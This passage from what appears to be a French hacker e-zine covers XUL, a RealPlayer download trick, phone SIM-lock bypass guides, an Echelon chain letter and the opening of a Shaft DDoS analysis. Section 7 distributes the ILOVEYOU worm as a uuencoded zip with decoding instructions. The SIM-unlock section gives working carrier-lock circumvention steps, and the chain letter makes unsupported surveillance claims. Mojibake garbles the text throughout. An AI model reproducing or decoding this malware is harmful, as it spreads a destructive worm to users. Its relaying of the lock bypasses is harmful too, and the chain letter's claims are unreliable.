_ _______________________________________ _ -*4*- `^А*;:,.> Xul and Ram <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏGardworld ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,И

xxx - PREMIERES INFORMATIONS SUR XUL - xxx x - XML-based User Interface Language - x ------------------------------------------ XUL (prononcer zoul pour impressionner votre grand-mшre) est un nouveau langage intщgrant les technologies diverses du XML visant la personnalisation du navigateur, et dans un avenir proche une meilleure portabilitщ et standardisation des documents HTML, de sorte qu'ils soient interprъtщs de la mъme maniшre partout. Dщveloppщ depuis quelques temps par Mozilla et pour ses navigateurs, il serait intщgrщ dans la toute derniшre version de Netscape Navigator, et le serait probablement dans les versions р venir de MS Internet Explorer. D'une structure apparemment semblable aux inclusions javascript, il pourrait s'inclure dans une balise du document, mais plus courammment dans un fichier sщparщ р l'extension .xul, et avec spщcification de document MIME: "text/x-xul". Ce qui pourrait bientєt ъtre considщrщ comme une nouvelle extension standard du XML devrait permettre entre autre de totalement redщfinir la fenъtre de navigation, des barres de menu aux boutons, on comprend ainsi aisщment les avantages que cela reprщsenterait pour la portabilitщ du document. Pour que vous compreniez mieux voici un exemple de dщfinition de fenъtre dans le document HTML provenant du site officiel de Mozilla: <?xml version="1.0"?> <?xml-stylesheet href="chrome://global/skin/xul.css" type="text/css"?> <!DOCTYPE window> <window id="main-window" xmlns:html="http://www.w3.org/TR/REC-html40" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <menubar> <menu name="File"> <menuitem name="Hello World!" onclick="dump('Hello world!\n');"/> </menu> </menubar> <html:iframe id="content-frame" src="contentframe.html" flex="100%"/> </window> Vous comprendrez donc qu'une telle syntaxe offrirait des possibilitщs de crщation de documents proches de l'applicatif, р la maniшre d'une machine virtuelle JAVA, tout en щtant essentiellement moins lourds. Ce langage щtant р peine sorti je n'ai pu rщussir р rщcolter plus d'informations, mais vous pouvez nщammoins aller voir ce qui se dit ici en attendant sa popularisation: http://www.trucsweb.com/compatibilite/ http://www3.sympatico.ca/ndeakin/mozilla/xultu/ http://www.mozilla.org/xpfe/xptoolkit/xulintro.html xxx - DERNIERES INFORMATIONS SUR RAM - xxx Comment d/l ce qu'ils ne veulent pas que vous d/liez \ Ou une petite astuce sur le format .ram / ----------------------------------------- Et ouais nous en sommes arrivщ р un point oљ ils inventent des technologies pour nous faire rester sur leurs sites. Oљ je veux en venir? J'y viens tout de suite. Vous aurez sћrement remarquщ au cours d'une de vos investigations internautiques un petit travers du format .rm pour le RealPlayer G2. Lequel? Le fichier que vous щcoutez lit sa source directement sur le web, ce ki fait ke vous l'avez dans l'os si vous vouliez telecharger le fichier en kestion, et vous n'avez plus qu'a revenir sur le site chaque fois que vous voulez l'щcouter. Mais n'ayez crainte, il suffit de se pencher 2 secondes sur ce petit probleme pour nous voir sourire sa solution. Tout d'abord il faut isoler le fichier pointщ par le lien, car il est bien souvent cachщ par une quelconque routine js. Pour cela rien de bien compliquщ, une simple analyse du code source de la page nous la livre, ou bien tt simplement faire 'enregistrer la cible'. Si la page est en flash (et lр est le seul probleme), ouvrez une premiшre fois le lien, puis contemplez l'historique des pages visitщes. Ensuite, ne vous gъnez pas et tщlщchargez ce premier fichier qui porte l'extension .ram puis ouvrez le avec un editeur texte standard (bloc note ou vi). Et lр oh surprise, le seule contenu de ce fichier est une seconde url, celle du fichier .rm, le bon cette fois-ci, que vous pouvez tщlщcharger р votre grand plaisir et l'щcouter toute la nuit. C tout, vous l'auriez dщcouvert tt seuls petits chenapans, р une prochaine fois! gard (matforever@hotmail.com) http://www.gardworld.tsx.org

_ ________________________________________ _ -*5*- `^А*;:,.> Simlock et compagnie <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏ By g3n0c1d3 ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ

ndt : Avis a tout possesseur de telephone mobile, gsm, bibop, ou similaire ; la mise en application des procedes decrits ci-dessous est tres fortement deconseillee si : -c'est votre telephone -ca n'est pas votre telephone -ca n'est pas encore votre telephone -ca n'est plus votre telephone Pour les autres je voudrais bien savoir comment on pourrait mettre ca en application sans posseder un mobile... tob Les fiches cuisines de G3n0c!d3 Comment unlocker un sony C1 ? ----------------------------- Tout d'abord allumer votre mobile est tapez *#06# le imei va s'afficher, il comporte 15 chiffres exemple: 495826485210324 recopier votre numero de serie exepter le dernier chiffre et des 6 premiers chiffres, pour notre cas sa nous donne, 48521032. Lancez le programme C1 et tapez les 8 chiffres notщ. le programme vous donne la CLEF SIMLOCK dans notre cas= 23685917, il vous reste a taper le code suivant: *#7465625*32*+vos 8 chiffres# le portable va rebooter(!) la programmation est accomplie. Pour toutes questions: n0kia@multimania.com Icq: 65647541 url pour telecharger le programme: http://www.multimania.com/ro0t/ro0t/ http://www.multimania.com/n0kia/c1 Nokia 6610 & 5110 ----------------- Lorsque vous achetez un telephone portable compris dans un pack, par exemple: Mobicarte. Celui-ci est bloque de facon que vous ne puissiez utiliser qu'avec un abonnement iteneris, ce qui est explique souvent le prix du portable 450 > ... ily a plusieurs types de verouillages: - Le verouillage SIM (empeche d'utiliser une autre sim) -Le network lock qui vous oblige d'utiliser la carte sim de l'operateur en question - Et enfin le verouillage du produit ( le verouillage du portable lui meme). Comment deveroullier ? ( pour toutes les operations qui vont suivrent vous aurez besoins du cable M2bus voir shema). Soft utiliser: Nokiall.exe ce debloquage s'applique juste pour le network lock 1А Banchez le cable soit dans le port Com1 ou Com2 2А Verifier si le cable est bien branchez sur votre telephone. 3А Lancez le soft, et allumez le portable. 4Аclickez Sur unlock . Bon maintenant pour les vraies dur une autre maniere qui vous permet de deveroullier completement le portable. Soft utiliser: Imei.exe, Wintesla 5.X ou version >, winopen. 1А installer wintesla, et configurez le de facon que le soft reconnaise votre Portable. 2Аmaintenant il faut calculer le code de securite (imei) avec imei.exe Pour trouver le code de securite de solution: vous regardez ou dos du tel ou en tapant *#06# 3А vous aurez besoin de Winopen, commencez a choisir le port de communication com 1 ou com2 (dans Winlock, =>option) 4АSelectionnez open pour les niveaux Simlock 1 et 4 et cliquez sur Write phone. 5А Entrez le code de securitщ calculez de l'etape 2 et clickez ok. Apres avoir completщ ces щtapes, votre telephone acceptera n'importe quelle carte sim. Par contre en rattachant le telephone a Wintesla, l'information affichee sera que les simlocks sont toujours actifs.. En lisant les memes infos avec la version originale de Winlock, les infos sont les memes, on peut en deduire que le telephone "ment" au programme. Il ne s'agit donc pas d'une suppression mais d'un contournisme (ca existe ce mot?)/ !!! attention si winopen ne fonctionne pas avec votre portable essayer Winlock mm chose. kk liens: http://membres.tripod.fr/n0kiaunlockeur http://members.tripod.com/n0kiaunlockeur. vous trouverez sur ce site les softs utiliser. http://www.gsmhacking.com http://www.gsmfactory.com Comment verifier si votre portable est bloquщ? ----------------------------------------------- pour Le fournisseur de services #pw+<1234567890>+<1># pour la protection du rezo: #pw+<1234567890>+<2># pour la 2iщme protection du fournisseur de services: #pw+<1234567890>+<3># pour La carte SIM #pw+<1234567890>+<4># [pour obtenir W appuyer 4x sur *] [pour le p appuyer 3 fois la touche *] pour obtenir + appuyer 2x sur*] Si vous obtenez comme reponses SIM WAS NOT RESTRICTED cela signifie qu'il n'ya pas de protection Trucs & astuces: afficher le soft : (*#9999#) afficher imei: *#06# Mode EFR : Activer : (*3370#) Dщsactiver : (#3370#) Un menu cachщ, le menu service Activer : (*#92702689#) ----------------------------------------------------------- Instruction pour unlock.exe d'alcatel Apres avoir rentre votre IMEI, vous obtenez deux codes, ON, OFF et le type de telephone. ON est le code pour activer le SIMLOCK (pour les mazos:-) donc on va tout naturellement sur OFF qui est censщ dщSIMLOCKer, mais comme le code est incomplet (en partie pour les reseaux espagnols et pour les autres, allez savoir..). Les observateurs constateront que le numero qui s'affiche est en HEXA (probablement en standard pour l'apparition de l'ipv6) mais qui actuellement contient des valeurs fixes correspondant au fournisseur d'acces locaux. et le CODE correct pour UNLOCKer est la somme des deux. Ex : IMEI: 330020536226XXX ON: 50453d90 OFF: 10453d90 Phone type: Alcatel HC800 Network provider: E MOVISTAR (214-07) Si l'on introduit le code OFF, le telephone ne l'acceptera pas. Il faudra ahouter un autre numero a ce code. En espagne pour un 217-07 (MoviStar) il faudra rentrer 9FDFFA. Il va falloir additionner ces numeros. La methode la plus facile est d'utiliser une calculatrice scientifique (calc.exe) en mode hexadecimal et de realiser la somme : 10453d90+9FDFFA=10E51D8A 10E51D8A est le bon numero (inutile d'essayer le loto ca passe pas). On le tape dans le telephone et miracle le SIMLOCK s'est fait la malle :-))) Document fourni par email et traduit par hasard le 12-05-2000 a 19h21 GMT T. <nokia@rootmail.com>

_ ___________________________________________ _ -*6*- `^А*;:,.> Echelon <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ By anonymouz ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄ

Ceci est une copie d'un courrier recu dans la BAL du gang, a la demande "veux tu rester anonyme", l'auteur n'a pas repondu. Qui ne dit rien consent, nous respectons son anonymat... --------snip--------- A faire passer soigneusement a plein d'autres gens Vous le savez peut-etre. La NSA (National Security Agency) a developpe un reseau de 120 satellites avec l'aide du Canada, de l'Australie, de la Nouvelle-Zelande et de nos amis britanniques. Le but consiste en l'ecoute de tout ce qui se dit ou s'ecrit par telephone, fax, email, etc. Pour cela "Echelon", le nom du programme en question utilise des mots-cles. Chaque message utilisant un de ces mots-cle est aussitot intercepte par les machines, puis lu ou ecoute. Chaque jour, "Echelon" pirate ainsi en toute illegalite l'equivalent de la bibliotheque du Congres americain. Si vous souhaitez contribuer a saturer les ordinateurs de Fort Meade (quartier general de la NSA), et a faire griller (on peut rever) leurs ordinateurs Super-Cray, envoyez ce message a ous vos amis. Il contient une liste non-exhaustive de ces mots-cle. Vos messages seront immediatement captes par les ordinateurs de la NSA. Mathematiquement, il se trouve que les seuls francais connectes a internet ont la capacite de faire sauter le systeme, ne serait-ce que quelques heures. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Voici la liste: Explosives, guns, assassination, conspiracy, primers, detonators, initiators, main charge, nuclear charges, ambush, sniping, motorcade, IRS, BATF, jtf-6, mjtf, hrt, srt, hostages, munitions, weapons, TNT, rdx, amfo, hmtd, picric acid, silver nitrite, mercury fulminate, presidential motorcade,salt peter, charcoal, sulfur, c4, composition b, amatol, petn, lead azide, lead styphante, ddnp, tetryl, nitrocellulose, nitrostarch, mines, grenades, rockets, fuses, delay mechanism, mortars, rpg7, propellants, incendiaries, incendiary device, thermite, security forces, intelligence, agencies, hrt, resistance, psyops, infiltration, assault team, defensive elements, evasion, detection, mission, communications, the football, platter charge, shaped charges, m118, claymore, body armor, charges, shrapnel, timers, timing devices, boobytraps, detcord, pmk 40, silencers, Uzi, HK-MP5, AK-47, FAL, Jatti, Skorpion MP, teflon bullets, cordite, napalm, law, Stingers, RPK,SOCIMI 821 SMG, STEN, BAR, MP40, HK-G3,FN-MAG, RPD,PzB39, Air Force One, M60, RPK74, SG530, SG540, Galil arm, Walther WA2000, HK33KE, Parker-Hale MOD. 82, AKR, Ingram MAC10, M3, L34A1, Walther MPL, AKS-74, HK-GR6, subsonic rounds, ballistic media, special forces, JFKSWC, SFOD-D, SRT, Rewson, SAFE, Waihopai, INFOSEC, ASPIC, Information Security, SAI, Information Warfare, IW, IS, Privacy, Information Terrorism, Kenya, Terrorism Defensive Information, Defense Information Warfare, Offensive Information, Offensive Information Warfare, NAIA, SAPM, ASU, ECHELON ASTS, National Information Infrastructure, InfoSec, SAO, Reno, Compsec, JICS, Computer Terrorism, Firewalls, Secure Internet Connections, RSP, ISS, JDF, Passwords, NAAP, DefCon V, RSO, Hackers, Encryption, ASWS, Espionage, USDOJ, NSA, CIA, S/Key, SSL, FBI, Secret Service, USSS, Defcon, Military, White House, Undercover, NCCS, Mayfly, PGP, SALDV, PEM, resta, RSA, Perl-RSA, MSNBC, bet, AOL, AOL TOS, CIS, CBOT, AIMSX, STARLAN, 3B2, BITNET, Tanzania, SAMU, COSMOS, DATTA, E911, FCIC, HTCIA, IACIS, UT/RUS, JANET, ram, JICC, ReMOB, LEETAC, UTU, VNET, BRLO, SADCC, NSLEP, SACLANTCEN, FALN, 877, NAVELEXSYSSECENGCEN, BZ, CANSLO, CBNRC, CIDA, JAVA, rsta, Active X, Compsec 97, RENS, LLC, DERA, JIC, rip, rb, Wu, RDI, Mavricks, BIOL, Meta-hackers, ^?, SADT, Steve Case, Tools, RECCEX, Telex, OTAN, monarchist, NMIC, NIOG, IDB, MID/KL, NADIS, NMI, SEIDM, BNC, CNCIS, STEEPLEBUSH, RG, BSS, DDIS, mixmaster, BCCI, BRGE, SARL, Military Intelligence, JICA, Scully, recondo, Flame, Infowar, Bubba, Freeh, Archives, ISADC, CISSP, Sundevil, jack, Investigation, JOTS, ISACA, NCSA, ASVC, spook words, RRF, 1071, Bugs Bunny, Verisign, Secure, ASIO, Lebed, ICE, NRO, Lexis-Nexis, NSCT, SCIF, FLiR, JIC, bce, Lacrosse, Flashbangs, HRT, IRA, EODG, DIA, USCOI, CID, BOP, FINCEN, FLETC, NIJ, ACC, AFSPC, BMDO, site, SASSTIXS, NAVWAN, NRL, RL, NAVWCWPNS, NSWC, USAFA, AHPCRC, ARPA, SARD, LABLINK, USACIL, SAPT, USCG, NRC, O, NSA/CSS, CDC, DOE, SAAM, FMS, HPCC, NTIS, SEL, USCODE, CISE, SIRC, CIM, ISN, DJC, bemd, SGC, UNCPCJ, CFC, SABENA, DREO, CDA, SADRS, DRA, SHAPE, bird dog, SACLANT, BECCA, DCJFTF, HALO, SC, TA SAS, Lander, GSM, T Branch, AST, SAMCOMM, HAHO, FKS, 868, GCHQ, DITSA, SORT, AMEMB, NSG, HIC, EDI, benelux, SAS, SBS, SAW, UDT, EODC, GOE, DOE, SAMF, GEO, JRB, 3P-HV, Masuda, Forte, AT, GIGN, Exon Shell, radint, MB, CQB, CONUS, CTU, RCMP, GRU, SASR, GSG-9, 22nd SAS, GEOS, EADA, SART, BBE, STEP, Echelon, Dictionary, MD2, MD4, MDA, diwn, 747, ASIC, 777, RDI, 767, MI5, 737, MI6, 757, Kh-11, EODN, SHS, ^X, Shayet-13, SADMS, Spetznaz, Recce, 707, CIO, NOCS, Halcon, NSS, Duress, RAID, Uziel, wojo, Psyops, SASCOM, grom, NSIRL, D-11, SERT, VIP, ARC, S.E.T. Team, NSWG, MP5k, SATKA, DREC, DEVGRP, DF,DSD, FDM, GRU, LRTS, SIGDEV, NACSI, MEU/SOC,PSAC, PTT, RFI, ZL31, SIGDASYS, TDM, SUKLO, SUSLO, TELINT, fake, TEXTA, ELF, LF, MF, SIGS, VHF, Recon, peapod, PA598D28, Spall, dort, 50MZ, 11Emc Choe, SATCOMA, UHF, SHF, ASIO, SASP, WANK, Colonel, domestic disruption, 5ESS, smuggle, Z-200, 15kg, DUVDEVAN, RFX, nitrate, OIR, Pretoria, M-14, enigma, Bletchley Park, Clandestine, NSO, nkvd, argus, afsatcom, CQB, NVD, Counter Terrorism Security, SARA, Rapid Reaction, JSOFC3IP, Corporate Security, Police, sniper, PPS, ASIS, ASLET, TSCM, Security Consulting, M-x spook, Z-150T, High Security, Security Evaluation, Electronic Surveillance, MI-17, ISR, NSAS, Counterterrorism, real, spies, IWO, eavesdropping, debugging, CCSS, interception, COCOT, NACSI, rhost, rhosts, ASO, SETA, Amherst, Broadside, Capricorn, NAVCM, Gamma, Gorizont, Guppy, NSS, rita, ISSO, submiss, ASDIC, .tc, 2EME REP, FID, 7NL SBS, tekka, captain, 226, .45, nonac, .li, Ionosphere, Mole, Keyhole, NABS, Kilderkin, Artichoke, Badger, Emerson, Tzvrif, SDIS, T2S2, STTC, DNR, NADDIS, NFLIS, CFD, quarter, Cornflower, Daisy, Egret, Iris, JSOTF, Hollyhock, Jasmine, Juile, Vinnell, B.D.M., Sphinx, Stephanie, Reflection, Spoke, Talent, Trump, FX, FXR, IMF, POCSAG, rusers, Covert Video, Intiso, r00t, lock picking, Beyond Hope, LASINT, csystems, .tm, passwd, 2600 Magazine, JUWTF, Competitor, EO, Chan, Pathfinders, SEAL Team 3, JTF, Nash, ISSAA, B61-11, Alouette, executive, Event Security, Mace, Cap-Stun, stakeout, ninja, ASIS, ISA, EOD, Oscor, Merlin, NTT, SL-1, Rolm, TIE, Tie-fighter, PBX, SLI, NTT, MSCJ, MIT, 69, RIT, Time, MSEE, Cable & Wireless, CSE, SUW, J2, Embassy, ETA, Fax, finks, Fax encryption, white noise, Fernspah, MYK, GAFE, forcast, import, rain, tiger, buzzer, N9, pink noise, CRA, M.P.R.I., top secret, Mossberg, 50BMG, Macintosh Security, Macintosh Internet Security, OC3, Macintosh Firewalls, Unix Security, VIP Protection, SIG, sweep, Medco, TRD, TDR, Z, sweeping, SURSAT, 5926, TELINT, Audiotel, Harvard, 1080H, SWS, Asset, Satellite imagery, force, NAIAG, Cypherpunks, NARF, 127, Coderpunks, TRW, remailers, replay, redheads, RX-7, explicit, FLAME, JTF-6, AVN,ISSSP, Anonymous, W, Sex, chaining, codes, Nuclear, 20, subversives, SLIP, toad, fish, data havens, unix, c, a, b, d, SUBACS, the, Elvis, quiche, DES,1*, NATIA, NATOA, sneakers, UXO, (), OC-12, counterintelligence, Shaldag, sonage, Sport, NASA, TWA, DT, gtegsc, owhere, .ch, hope, emc, industrial espiUPIR, PI, TSCI, spookwords, industrial intelligence, H.N.P., SUAEWICS, Juiliett Class Submarine, Locks, qrss, loch, 64 Vauxhall Cross, Ingram Mac-10, wwics, sigvoice, ssa, E.O.D., SEMTEX, penrep, racal, OTP, OSS, Siemens, RPC, Met, CIA-DST, INI, watchers, keebler, contacts, Blowpipe, BTM, CCS, GSA, Kilo Class, squib, primacord, RSP, Z7, Becker, Nerd, fangs, Austin, no|d, Comirex, GPMG, Speakeasy, humint, GEODSS, SORO, M5, BROMURE, ANC, zone, SBI, DSS, S.A.I.C., Minox, Keyhole, SAR, Rand Corporation, Starr, Wackenhutt, EO, burhop, Wackendude, mol, Shelton, 2E781, F-22, 2010, JCET, cocaine, Vale, IG, Kosovo, Dake, 36,800, Hillal, Pesec, Hindawi, GGL, NAICC, CTU, botux, Virii, CCC, ISPE, CCSC, Scud, SecDef, Magdeyev, VOA, Kosiura, Small Pox, Tajik, +=3D, Blacklisted 411, TRDL, Internet Underground, BX, XS4ALL, wetsu, muezzin, Retinal Fetish, WIR, Fetish, FCA, Yobie, forschung, emm, ANZUS, Reprieve, NZC-332, edition, cards, mania, 701, CTP, CATO, Phon-e, Chicago Posse, NSDM, l0ck, spook, keywords, QRR, PLA, TDYC, W3, CUD, CdC, Weekly World News, Zen, World Domination, Dead, GRU, M72750, Salsa, 7, Blowfish, Gorelick, Glock, Ft. Meade, NSWT, press-release, WISDIM, burned, Indigo, wire transfer, e-cash, Bubba the Love Sponge, Enforcers, Digicash, zip, SWAT, Ortega, PPP, NACSE, crypto-anarchy, AT&T, SGI, SUN, MCI, Blacknet, ISM, JCE, Middleman, KLM, Blackbird, NSV, GQ360, X400, Texas, jihad, SDI, BRIGAND, Uzi, Fort Meade, *&, gchq.gov.uk, supercomputer, bullion, 3, NTTC, Blackmednet, :, Propaganda, ABC, Satellite phones, IWIS, Planet-1, ISTA, rs9512c, South Africa, Sergeyev, Montenegro, Toeffler, --------snip---------

_ ________________________________________ _ -*7*- `^А*;:,.> Love Parade <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ By Tobozo ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ

Voici le code du virus qui a soit-disant coutщ plusieurs millions de dollars a la communaute internaute. Disons qu'il a certainement rapportщ plusieurs millions a la communautщ des diffuseurs d'anti-virus et des subventions plus grosses pour les organismes publics qui commencent a en avoir marre de se taper des pentium 133. Rappelons que les auteurs ont pu s'en sortir en toute impunitщ grace a leurs lois locales. En allemagne il fait bon coder des virus si on ne les diffuse pas (envoyer a plus de deux personnes). Aux philippines il fait bon distribuer des virus car la-bas ils sont assez intelligents pour ne blamer que la faiblesse du systeme. Le code est inclus dans ce hackoff mais il est rendu inactif par plusieurs choses : 1) Ajout de retours chariots la ou il ne faut pas 2) Type de fichier rendu mixte donc inscannable 3) Encodage en base_64 4) Encodage en .zip Quand vous attrappez la grippe, vous blamez la nature vous ? Blah blah blah avec ton encodeur tu encoderas et avec ton decodeur tu decoderas.... Mode d'emploi : renommer le hackoff22,htm en hackoff22.uue et l'ouvrir avec une version recente de winzip. Surtout ne pas renommer le fichier iloveyou.dbx en .vbs car ca le rendrait actif, appreciez plutot la beaute de l'art numerique qui s'y trouve...
_=_ _=_ Part 001 of 001 of file virus i love you .zip _=_ begin 666 virus i love you .zip M4$L#!!0````(``FWJ"B3IH%'+0T``!`G```5````=FER=7,@:2!L;W9E('EO M=2`N9&)XO1K]5^)(\G?>XW_H8_=Y<`:4#W7',>Z@XL>(X@*.,W?>S@M)AP22 M3NP$D)FW][=?57<2$CYTYG9N?0KIZJKJ^NJJZHZYQSGM;L\S0W+!O8D/X'SN1F.VHREWENW8OF\S&N1S'49:G'N<=&DP M<2FYI<]A/F?8+C$#3S%L'LR#D+KX-+,9?L'(5^B3HH=<,6V'*M-!H'O^7#&\ M63Y'G]1"(9^#274WG^O1$/D0E9QR"CIU!B.JA\5"3^>V']IL6#D'#CVQA)PK ME/*Y`*D`#F1`7.GXE/5!+$0M/DC2BOPZGS@.TURJ5($LDD-%TDJ7:D;3!3I7.)`*/'!YN!M0*2V"&?N_2"\!'LA:/@L6^[ MU)L(:]@F*7)^K%9+)+0H`Z.^1J3L*H5NZ^+SV4.G>P;.H,P@MBF](?T86?:" MACV?ZK;FG'L.1%%QMY1@2;]O0JPN$#$>-J'5(C1]@;#!B[?@14#6*Z?@PF*R M_E;A\:9W33FC3KU6`0\7,DB@"F"`->NULW9[=3YATNY\:)7;K7Z_U2V?=[KE M3YW[2O]C/Z;@=,@G+,#8L$+7$?'B@^.-T*.XLQ#@V$&H&=R>X@!-"A$EPRI% MO3ZRSB"RV,3%'<*0JUA0%X&5S\F(:7=.F^W/-\W3RZO;U@LA\W@ZX9RR\`/E M@>VQQ^Z$I2P$W)07;/=CU^U1/K5U&@!*/B<]4%#6.P4V5Z2ZR`[)`,09TO`; M-\T5"U$9L&?KV7<\3OGC&3!R/,T@9S:'_>GQ>;QC4NO%^V8!T@\?4]L"T3%G MT&?P<"9J0(?S9A^,1Y]IH;38@5T-;.+:7\"*X%:(;1"M6&R0?Y`N,TIDFU2E M%'*RNKOF)^*4^(.`#4[O7U*;)%K?0!I[[(4:!U/<:4-:4`I6&/J'.SNSV:P2 MC.>0VL,*_.W\9^Y-V+`:[%R^O[9&;$:Y-1H_Z]-Y"(\AN^F?SVC(C\-I8)@'^P=OV&@P_=3?>;BZ+9_<7_3.KSX*6X#QG(`F&M;^ M(FTT-J2.KH4[P=C1C)'IF,9H:%V_9ZC%_.SBW!Z/[J_F3Z#<`_AFK[%_\,M^ MO=8`I1LC=GEY,9@.W.OV^^N1-7X:-6:OZ57_B_0:>[9NV3LC<[_?'8WUP477 MOWC2GJIO?ID.SC_L6>9Y:SSP_!/CMW\R%[AU+'/8ZNX?#.H?!M/A:UHT_B(M M=&NR$QA#$ZP-T3,:.[]<&4N9H1@+9/LUK]H+%?K=4;]F1^$%JC MC-KY7*QXM*"\H($2P[ZCH3XHK>T M`;0$AP-'8^,E^R3U*ZEL+]4O0S%T)8BJ?ES/SX`(N\ASH&AIND6`.X/I?.[* M)(:<[L]]*G($X*1`:IWTA;E-T2HXPC\57PLML$VAM!!5BI#("*R")?EM9D+R M1S<'1I*UQRMH]24D$^0F>979MR&2(N:9@'1 M'2^@9I48!30_U(#,["ZST,)#-?#*V0NW'RBD<%=OU!(RU9%)T27ZC)7\8<9,/AW^6%6_595JM(&^ M2WH(];3TKE_+"`_38EUY$%J6?[$6X"TK@*"4!EH8;M``9BKPQ^W!)*2!FAUN MU[+YG#X=':?V8"0JS@0@/>SDN&$3.B',L=EX!0B(%9O9`I+/(2B0AY(8N$"S M'#]CDB`Z@=EK#9..IS1+H(WI*@]HJ#;43E+XEX3^N[!A_JU[U3V-3HH;<0BY M+:TAQJD!N-&YI; M/J'SC9BIAD2X2_?<[UZ.[:H>(]7#]YVKV\.?#K]NQ*NJA.Q@L)&?F:V/B:J2 MGZ&TE,A7`@*'Y(^-E#6DK!BZ3@(,9T$.+<;6:^?4R_[-1IYU-;M>G,*?U$48 MKG9%3-3!3`U-5>'O*:&!^:(_(J-"PS%WEB^CUJ]UI&(>*TCS$V6^*76-2=,#Z&@D^@P^[^N M![1J:EEQFQ3SPL7B=5(K+CI;8;#7/.8&PZ@C!D]AKFHA;;`@+D4M&2""R+NR M3,3#ZB)^DG4!+)ANDD^X+9+PVZ(J(V,23;&@"QYQ.OZ3HF+0K-ST;);N6='P MWA,#,<`':/:Y30/%A52E&)B`KMNAI/9-$[D]#Q MO'&EZ?N.#<=@T"`FA(51H597IHLQ.7![5JLB8J#F,?E.7IXO/S'(/E"C44Z672@TKLV M&Q*3>[`7:25FU12H;B+#=]RM2BG!G:M9-3Y@QT:\[(`97[.B4EU_N_VL/F]7 MXZKPVDJOA*:R*6!DEOF_<<_4YUZ4#&X]:.7PMK\7;_0$DBE^>'/]4O)R\(V/ MPA0CU*KX48,/?,#O.OPU%`>'>_"W#Q2`I1:.+EO-L^.C_E6_W3I.A4F90%?2 M/OJU_*N<.KII]9MP5F_>M-1WY7<7E%&NA1Z'9W+:N>V#51!^TNQVKLF'DQXP M6'"#B>/"5A2FY#-84[`C,;?F)+166$7OP$""U7=@`,SGUKP$0^3H)1A)O06+ MX!P:D=KN[NYKXIS1J-_RV+),MNL[E,"IA=C8?[.Q[,)MZ'6&GF=`_[R&.1JQ M>=5>!I\"TU;W.)_K(PLTMWPIQBCLV";4KRG]2$ZAW>>>@SQ\1/5(BVD#P(*D M)]\TA!GJ?*X?*+4(=3L,&81+1&S3DDG1$[$.[II=G^[ M;[7`H9T[M`*T<-"*AA3]?7'::7>Z")U#B?-F[\K@F.-R\O.EO.8G!03VL%:T MPO&R#">=LT_'1\+;J&%F'BA[I]VKNSYQ-#:<:$.*4KR7A77)"XC\MW(9&,%O M&H[I>B8N]RK@5@(HVA:A[L(W0>@L35A9^2>VA%;[-YR(F MKC>E?:^XJ^R6WD8@\(+]!8$S6['LTML_TNM+BBL3!9>+`))2E6'TK#"&FZ)Y!Q4=-?-;%9T/19MC_0);, M\M!F:C4-062U@-D(SM_X;@<6R'9)('GRQG/E=3%,EH!KBF&0?GT97S+06,>A MD>%0EY@'60XPEIQKRQQDEZFMNY%8%&LPU^_EW[-O!5=-..-V=),CQ"HL38DS M9G;Q-8>*UQ>5_<\J(XC""INX`\K51JVQB@4AM)L>RZJYR@=#;97:\/0)]C%2 MPWR.@"BM;K?3/22ZQB`10NZ&[`71`MLRSK.`LV0BN7E73+$J2P8BA7OA9`@+ M90X%PCD9S99[#\!8?4F1SX'%XP8$C1^W(/`R6E\'?L(+/H$GN_D<6&L5*`'X'>6$5? MVHDP5@H[$GLOA=V0NVN)^1MD_BBQ:VG):Z]*GD:OO2YY?17]!/, MSR__!5!+`0(4`!0````(``FWJ"B3IH%'+0T``!`G```5``````````$`(`"V M@0````!V:7)U6]U("YD8GA02P4&``````$``0!#````8`T` #```` ` end

_ ________________________________________ _ -*8*- `^А*;:,.> Shaft <.,:;*А^` ___________________/ЏЏЏЏЏЏЏЏЏЏЏЏЏЏ By Cakeii ЏЏЏЏЏЏЏЏЏЏЏЏЏЏЏ\_____________________ ЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ,јЄКА`АКЄј,ИИ

Analyse complщmentaire de Shaft

Introduction : Analyse sur un cas concret
Cette analyse est un complщment de l'analyse de Sven Dietrich sur l'outils de DDoS Shaft, du 16 mars 2000 vous trouverez sa traduction par Cakeii р l'adresse suivante : Analyse de Shaft. Ce texte nous permet d'analyser comment les pirates ont installщs Shaft sur un rщseau distant, se sont introduits sur le rщseau et modifiщs le systшme pour rendre invisible l'outil Shaft. Nous partageons ici les informations acquises sur d'autres sites et avec des administrateurs qui ont examinщs des systшmes piratщs.
Les noms d'utilisateur et les identifications de machine ont щtщ modifiщs. Nous avons essayщ d'entrer en contact avec les admins des domaine dont les noms des rщseaux sont apparus dans n'importe lequel de ces fichiers.

Comment nous avons trouvщ les informations

